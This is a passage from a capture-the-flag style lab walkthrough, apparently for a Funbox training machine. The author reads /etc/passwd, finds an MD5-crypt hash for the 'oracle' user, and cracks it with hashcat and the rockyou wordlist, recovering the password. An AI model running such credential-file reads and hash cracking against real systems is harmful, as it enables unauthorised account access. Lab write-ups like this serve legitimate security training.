passwd File Containing Hash
www-data@funbox7:/dev/shm$ cat /etc/passwd | grep -i oracle
oracle:$1$|O@GOeN\$PGb9VNu29e9s6dMNJKH/R0:1004:1004:,,,:/home/oracle:/bin/bashThe /etc/passwd file contains a hash of the oracle user. This was confirmed by PEAS as well.
Password Cracking
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/funboxeasyenum]
└─$ hashcat --show oracle.hash
500 | md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5) | Operating System
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/funboxeasyenum]
└─$ hashcat -a 0 -m 500 oracle.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
$1$|O@GOeN\$PGb9VNu29e9s6dMNJKH/R0:hiphop
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 500 (md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5))
Hash.Target......: $1$|O@GOeN\$PGb9VNu29e9s6dMNJKH/R0
Time.Started.....: Thu May 1 00:12:48 2025 (0 secs)
Time.Estimated...: Thu May 1 00:12:48 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 47668 H/s (10.76ms) @ Accel:64 Loops:1000 Thr:1 Vec:16
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 768/14344385 (0.01%)
Rejected.........: 0/768 (0.00%)
Restore.Point....: 0/14344385 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1000
Candidate.Engine.: Device Generator
Candidates.#1....: 123456 -> james1
Hardware.Mon.#1..: Util: 13%
Started: Thu May 1 00:12:46 2025
Stopped: Thu May 1 00:12:50 2025Password hash cracked for the oracle user; hiphop
Moving on to the Lateral Movement phase